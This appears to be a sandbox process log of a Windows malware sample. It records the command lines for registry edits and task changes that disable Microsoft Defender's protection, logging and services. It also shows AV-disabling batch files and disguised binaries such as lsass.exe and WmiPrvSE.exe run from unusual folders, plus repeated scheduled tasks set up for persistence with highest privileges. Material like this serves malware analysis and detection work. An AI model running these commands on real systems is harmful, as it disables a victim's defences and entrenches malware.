C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\ja-JP\msedge.exe
"C:\Windows\ja-JP\msedge.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\ZqKnM.bat" "
C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe
"C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2012,9679209378594885057,15589161307796029287,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4148 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\FunCheker.exe
"C:\Users\Admin\AppData\Local\Temp\FunCheker.exe"
C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe
"C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\clear_av.bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FunChecker .bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\avdisable.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\kXeJA.vbe"
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\ZqKnM.bat" "
C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe
"C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\MSBuild\winlogon.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files (x86)\MSBuild\winlogon.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\MSBuild\winlogon.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 13 /tr "'C:\Windows\Performance\WinSAT\DataStore\SearchApp.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Windows\Performance\WinSAT\DataStore\SearchApp.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 14 /tr "'C:\Windows\Performance\WinSAT\DataStore\SearchApp.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\dllhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Users\Default User\dllhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\dllhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\Idle.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\Idle.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\Idle.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\Users\All Users\Templates\System.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Users\All Users\Templates\System.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\Users\All Users\Templates\System.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 11 /tr "'C:\Users\All Users\WindowsHolographicDevices\cmd.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Users\All Users\WindowsHolographicDevices\cmd.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\WindowsHolographicDevices\cmd.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\taskhostw.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostw" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\taskhostw.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\taskhostw.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\Windows\InputMethod\SHARED\conhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\InputMethod\SHARED\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\Windows\InputMethod\SHARED\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\conhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 5 /tr "'C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msedgem" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\msedge.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msedge" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\msedge.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msedgem" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\msedge.exe'" /rl HIGHEST /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\wzSW7E5aas.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe
"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\pakqiPPahT.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe
"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\oqEnL4f5pl.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\avdisable.bat" "
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe
"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\kbrh69MYEy.bat"
C:\Windows\system32\reg.exe
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\system32\reg.exe
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\clear_av.bat" "
C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe
"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\gyyX5OxKdc.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe
"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\IxigaWiN4Z.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe
"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ATZuYpZxcK.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe
"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\3B2OAH3dio.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe
"C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\kXeJA.vbe"
C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe
"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\TK13bru719.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe
"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\ZqKnM.bat" "
C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe
"C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\n9GQh003RW.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Portable Devices\RuntimeBroker.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Portable Devices\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\cmd.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\cmd.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\cmd.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\lsass.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\lsass.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 5 /tr "'C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\lsass.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows Mail\cmd.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Mail\cmd.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Mail\cmd.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 12 /tr "'C:\Windows\Panther\actionqueue\Registry.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Windows\Panther\actionqueue\Registry.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 14 /tr "'C:\Windows\Panther\actionqueue\Registry.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\dwm.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Users\Default User\dwm.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 11 /tr "'C:\Users\Default User\dwm.exe'" /rl HIGHEST /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\CqaKHWd6Ky.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe
"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\QLJ4q7S46F.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\dwm.exe
"C:\Users\Default User\dwm.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\tlxpltA24S.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe
"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\CL2HVdYORd.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Default User\dwm.exe
"C:\Users\Default User\dwm.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ph6jqiBtuj.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe
"C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\yyRUJOSyqo.bat"
C:\Windows\system32\w32tm.exe
